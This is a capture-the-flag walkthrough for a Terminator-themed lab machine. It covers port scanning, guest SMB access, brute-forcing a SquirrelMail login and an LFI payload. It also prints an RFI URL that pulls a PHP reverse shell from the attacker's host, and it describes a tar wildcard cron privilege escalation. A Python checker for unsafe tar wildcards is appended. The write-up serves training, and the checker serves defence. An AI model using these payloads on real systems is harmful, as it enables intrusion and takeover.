Target IP: 10.10.17.113
A vulnerable Terminator themed Linux machine.
Are you able to compromise this Terminator themed machine?
There are six TCP ports open on the target machine.
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 992331bbb1e943b756944cb9e82146c5 (RSA)
| 256 57c07502712d193183dbe4fe679668cf (ECDSA)
|_ 256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL PIPELINING AUTH-RESP-CODE UIDL CAPA RESP-CODES TOP
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: ID SASL-IR LOGIN-REFERRALS LOGINDISABLEDA0001 listed LITERAL+ ENABLE IDLE have post-login Pre-login capabilities IMAP4rev1 OK more
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Ports 139 and 445: SMB
The SMB service allows guest login. There is an interesting share called anonymous, which holds two interesting files: attention.txt and log1.txt. I downloaded both files to my machine.
The contents of the two files are shown above: log1.txt contains a list of passwords, and attention.txt contains the username Miles Dyson.
Port 80: HTTP
The HTTP service serves the webpage shown above. The source code of this page does not contain anything useful either.
A directory search shows the entries above. The /squirrelmail entry sounds interesting.
The target machine is running SquirrelMail 1.4.23. A Google search shows this version is vulnerable to command execution.
Using Burp Suite, I brute-forced the login of this webmail application with the username milesdyson, which I encountered earlier. I now have a working credential, milesdyson:cyborg007haloterminator, which stands out in the picture above by its different response length.
I now have access to the emails of the user milesdyson.
The first email contains the password highlighted above. This password is for SMB.
Using the command smbclient //10.10.17.113/milesdyson -U milesdyson, I logged into SMB as the user milesdyson with the temporary password. There is an interesting file called important.txt inside the notes directory. The content of this file is shown in the image above. It looks like there is a hidden directory at /45kra24zxs28v3yd.
And browsing to the hidden directory displays the webpage above.
There is an interesting directory at /administrator. Trying default credentials did not work against this application.
Googling this application name shows it is vulnerable to LFI/RFI attacks.
Using the payload http://10.10.17.113/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php, I obtained the configuration file, but it was not helpful.
Since the target machine is vulnerable to RFI, I created a PHP Pentest Monkey reverse shell script on my machine and used Python's built-in HTTP server to serve it to the target. I started a listener on port 8443 and used the payload below to gain a reverse shell connection:
http://10.10.17.113/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.14.55.153/shell.php. Now I have a foothold on the target machine.
There is an interesting cron job named backup.sh. However, I do not have write permission on it, so I cannot modify the script.
It looks like tar is called with a wildcard, so this can be abused to gain a root shell. The shell expands the wildcard before tar runs, so every file name in that directory becomes a tar argument, and any name that begins with a dash is parsed as an option rather than a file.
Using the GTFOBins guide for tar, I ran the commands above to elevate my privileges to root. I now have a root shell. Game over.
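To turn the observation above into a check a defender can run over their own cron jobs, here is an added Python example (not part of the original writeup and not the room's backup script) that flags tar invocations where the shell expands an unquoted wildcard into tar's argument list; the crontab and script lines it scans are constructed placeholders.

```python
import re
from typing import List, Tuple

# Constructed sample input (placeholder paths and names, not the room's files):
# one crontab entry plus the lines of the backup script it runs.
SAMPLE_LINES = [
    "*/5 * * * * root /home/svc/backup.sh",
    "cd /var/www/html && tar cf /home/svc/backups/backup.tgz *",
    "cd /srv/uploads && tar -czf /tmp/uploads.tgz -- *",
    "cd /srv/data && find . -mindepth 1 -print0 | tar --null -T - -cf /tmp/data.tar",
]

# Tokens: single-quoted, double-quoted, or bare words (keeps quoting visible).
_TOKEN = re.compile(r"""'[^']*'|"[^"]*"|\S+""")
# Unescaped shell glob characters inside a bare word.
_GLOB = re.compile(r"(?<!\\)[*?\[]")


def tar_wildcard_findings(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, reason) for every tar invocation in which the
    shell, not tar, expands an unquoted glob into tar's argument list while
    option parsing is still active, so an entry whose name starts with '-'
    would be consumed as an option instead of being archived as a file."""
    findings = []
    for number, line in enumerate(lines, 1):
        # Examine each simple command separately (split on &&, ||, ;, |).
        for command in re.split(r"&&|\|\||;|\|", line):
            tokens = _TOKEN.findall(command)
            if not tokens or tokens[0].rsplit("/", 1)[-1] != "tar":
                continue
            args = tokens[1:]
            if "--" in args:  # "--" ends option parsing; later names are files
                continue
            if "--null" in args or "--verbatim-files-from" in args:
                continue  # names read from such a -T list are never options
            for token in args:
                if token[0] in "'\"":  # quoted: the shell passes it literally
                    continue
                if _GLOB.search(token):
                    findings.append((number, f"unquoted glob {token} is expanded "
                                     "by the shell before tar finishes option parsing"))
                    break
    return findings


if __name__ == "__main__":
    for number, reason in tar_wildcard_findings(SAMPLE_LINES):
        print(f"line {number}: {reason}")
```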
The user.txt flag, obtained once I gained a foothold.
The root.txt flag.